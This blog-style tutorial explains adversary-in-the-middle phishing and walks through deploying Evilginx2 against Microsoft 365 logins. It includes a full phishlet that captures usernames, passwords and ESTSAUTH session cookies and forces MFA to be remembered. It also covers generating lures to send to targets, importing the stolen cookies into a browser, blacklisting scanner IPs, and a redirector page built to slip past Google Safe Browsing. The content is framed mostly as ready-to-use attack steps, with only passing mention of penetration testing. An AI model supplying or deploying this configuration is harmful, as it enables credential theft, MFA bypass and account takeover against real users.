Evilginx 101: Introduction to Modern Phishing & Adversary-in-the-Middle Attacks

Evilginx 101: Introduction to Modern Phishing & Adversary-in-the-Middle Attacks
Evilginx2 - Modern phishing

What is an Adversary-in-the-Middle (AiTM) Attack?

An Adversary-in-the-Middle (AiTM) attack is a sophisticated phishing technique where an attacker intercepts and manipulates communication between a victim and a legitimate service. Unlike traditional phishing, which relies on tricking users into entering their credentials on a fake login page, AiTM attacks go a step further by capturing authentication tokens and session cookies, allowing attackers to bypass Multi-Factor Authentication (MFA) and gain persistent access to the victim’s account.

💡
In an AiTM attack, the attacker acts as a proxy between the user and the legitimate website, relaying requests and responses in real-time.

This allows them to:

  • Capture login credentials as they are entered
  • Steal session cookies to impersonate the victim
  • Maintain access even if the user changes their password (Some system doesn't expire their user's session when password changed)

How AiTM Attacks Differ from Traditional Phishing (MiTM):

FeatureTraditional PhishingAiTM Attack
MethodFake login page that collects credentialsProxy-based attack that intercepts traffic in real-time
MFA BypassDoes not work if MFA is enabledCan bypass MFA by stealing session cookies
PersistenceRequires repeated phishing attemptsAllows long-term access via stolen session tokens
DetectionEasier to detect through phishing awareness trainingHarder to detect as it mimics legitimate user behavior

What is Evilginx2?

Evilginx2 is an advanced adversary-in-the-middle (AiTM) phishing toolkit designed to capture login credentials and authentication tokens by acting as a transparent reverse proxy. It allows attackers and penetration testers to bypass Multi-Factor Authentication (MFA) by intercepting session cookies, enabling unauthorized access to target accounts without requiring the victim’s password or second-factor authentication.

Evilginx Workflow

Setting up Evilginx in remote server

Install requirement:

Build Evilginx from source:

Download Evilginx source code:

git clone https://github.com/kgretzky/evilginx2.git

Navigate to the directory and run:

make

Deploy to Remote server:

If you want deploy directly to a server, you'll need to open port 443 (Evilginx page) and 53 (DNS).

First, register a domain.

💡
Suppose your server has the IP address 183.11.23.22, and your domain is tontac.phish.

You must point the domain to this IP address.

Then, run the Evilginx binary using the following command:

./evilginx

I recommend adding the -debug flag to get detailed output and understand exactly what is happening:

./evilginx -debug

First, config for ipv4 and domain:

Then add a phishlet o365-mfa.yaml to ./phishlets directory:

💡
Phishlets are small configuration files, used to configure Evilginx for targeting specific websites, with a goal of perform phishing attacks.
name: 'o365-mfa'
author: '@tontac'
min_ver: '2.4.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}

sub_filters:
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT','SignInStateCookie',]
  - domain: 'login.microsoftonline.com'
    keys: ['ESTSAUTHLIGHT']
credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'
force_post:
  - path: '/kmsi'
    search:
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/common/SAS'
    search:
      - {key: 'rememberMFA', search: '.*'}
    force:
      - {key: 'rememberMFA', value: 'true'}
    type: 'post'

Create phishlet and enable it:

Create lures:

💡
Lures are essentially pre-generated phishing links, which you will be sending out on your engagements. Evilginx provides multiple options to customize your lures.

Now, you can use the generated links to send to your target.

In the next blog, I'll share some phishing strategies. 🙃

When a user falls for the phishing attempt, Evilginx will capture their credentials and session cookies.

After having their cookie, you can use StorageAce extension to import the cookies: https://chromewebstore.google.com/detail/storageace/cpbgcbmddckpmhfbdckeolkkhkjjmplo

Evilginx is a powerful framework because it comes with several useful built-in features...

Blacklist

💡
Blacklisting feature will help you block access from computers trying to scan your Evilginx HTTP server. With default settings, an IP of the originating request is added to blacklist whenever the request is unathorized.
Mode Description
all Block everything and blacklist all IPs.
unauth (default) Block unauthorized requests and blacklist the IPs.
noadd Block unauthorized requests but don’t blacklist the IPs.
off Block unauthorized requests but ignore already blacklisted IPs.

Examples

  • all → Scanning with VirusTotal? Scanner IP gets blocked & blacklisted.
  • unauth → Someone visits a wrong URL? Blocked & blacklisted.
  • noadd → Wrong URL accessed? Blocked, but IP is not blacklisted.
  • off → Already blacklisted IP visits again? Not blocked again, but new unauthorized requests still get blocked.

Redirector

💡
Redirectors are little websites, acting as a landing pages to your phishing links. When anyone clicks on your generated phishing link, they will land on the redirector website. This website should redirect the visitor to the reverse proxied phishing sign-in page, either automatically or by requiring some user interaction.

Simply, Evilginx acts as a landing page. When users visit the link, they are later redirected to the phishing page to bypass anti-phishing bot scans (e.g., Google Safe Browsing).

To create a redirector, navigate to the evilginx/redirectors directory and create a new folder (e.g., AntiBotScan).

Inside this folder, you can create an index.html file and embed JavaScript to control the redirection. Here’s a simple example that redirects the user after 2 seconds:

<!DOCTYPE html>
<script>
    document.write(`<meta http-equiv="Refresh" content="2; url=` + {lure_url_js} + `">`);
</script>
<html>
<head>
    <title>Loading...</title>
</html>

In evilginx interface, simply type:

lures edit 0 redirector /root/redirectors/nothingredirect/index.html

In the next post, I'll cover setting up Evilginx with Gophish, configuring a mail server to mimic the target’s email, and more… Stay tuned! 🚀